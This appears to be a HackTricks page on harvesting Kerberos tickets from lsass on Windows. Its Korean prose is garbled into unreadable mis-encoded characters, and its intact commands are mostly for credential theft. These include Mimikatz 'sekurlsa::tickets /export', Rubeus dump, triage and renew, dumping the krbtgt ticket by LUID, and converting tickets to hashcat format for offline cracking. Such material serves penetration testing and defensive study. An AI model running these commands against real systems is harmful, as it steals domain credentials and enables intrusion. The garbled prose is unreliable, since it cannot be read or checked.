Windows์์ ํฐ์ผ ์์งํ๊ธฐ
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Windows์์ ํฐ์ผ์ ๋ณด์ ์ ์ฑ ์ ์ฒ๋ฆฌํ๋ lsass (Local Security Authority Subsystem Service) ํ๋ก์ธ์ค์ ์ํด ๊ด๋ฆฌ๋๊ณ ์ ์ฅ๋ฉ๋๋ค. ์ด๋ฌํ ํฐ์ผ์ ์ถ์ถํ๋ ค๋ฉด lsass ํ๋ก์ธ์ค์ ์ธํฐํ์ด์คํด์ผ ํฉ๋๋ค. ๋น๊ด๋ฆฌ ์ฌ์ฉ์๋ง ์์ ์ ํฐ์ผ์ ์ ๊ทผํ ์ ์์ผ๋ฉฐ, ๊ด๋ฆฌ์๋ ์์คํ ์ ๋ชจ๋ ํฐ์ผ์ ์ถ์ถํ ์ ์๋ ๊ถํ์ ๊ฐ์ง๊ณ ์์ต๋๋ค. ์ด๋ฌํ ์์ ์ ์ํด Mimikatz์ Rubeus ๋๊ตฌ๊ฐ ๋๋ฆฌ ์ฌ์ฉ๋๋ฉฐ, ๊ฐ๊ฐ ๋ค์ํ ๋ช ๋ น๊ณผ ๊ธฐ๋ฅ์ ์ ๊ณตํฉ๋๋ค.
Mimikatz
Mimikatz๋ Windows ๋ณด์๊ณผ ์ํธ์์ฉํ ์ ์๋ ๋ค๋ชฉ์ ๋๊ตฌ์ ๋๋ค. ํฐ์ผ ์ถ์ถ๋ฟ๋ง ์๋๋ผ ๋ค์ํ ๋ณด์ ๊ด๋ จ ์์ ์๋ ์ฌ์ฉ๋ฉ๋๋ค.
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
Rubeus
Rubeus๋ Kerberos ์ํธ์์ฉ ๋ฐ ์กฐ์์ ์ํด ํน๋ณํ ์ค๊ณ๋ ๋๊ตฌ์ ๋๋ค. ํฐ์ผ ์ถ์ถ ๋ฐ ์ฒ๋ฆฌ๋ฟ๋ง ์๋๋ผ ๊ธฐํ Kerberos ๊ด๋ จ ํ๋์ ์ฌ์ฉ๋ฉ๋๋ค.
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
์ด ๋ช
๋ น์ ์ฌ์ฉํ ๋๋ <BASE64_TICKET> ๋ฐ <luid>์ ๊ฐ์ ์๋ฆฌ ํ์์๋ฅผ ์ค์ Base64 ์ธ์ฝ๋ฉ๋ ํฐ์ผ ๋ฐ ๋ก๊ทธ์จ ID๋ก ๊ฐ๊ฐ ๊ต์ฒดํด์ผ ํฉ๋๋ค. ์ด๋ฌํ ๋๊ตฌ๋ ํฐ์ผ ๊ด๋ฆฌ ๋ฐ Windows์ ๋ณด์ ๋ฉ์ปค๋์ฆ๊ณผ ์ํธ ์์ฉํ๋ ๋ฐ ๊ด๋ฒ์ํ ๊ธฐ๋ฅ์ ์ ๊ณตํฉ๋๋ค.
References
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


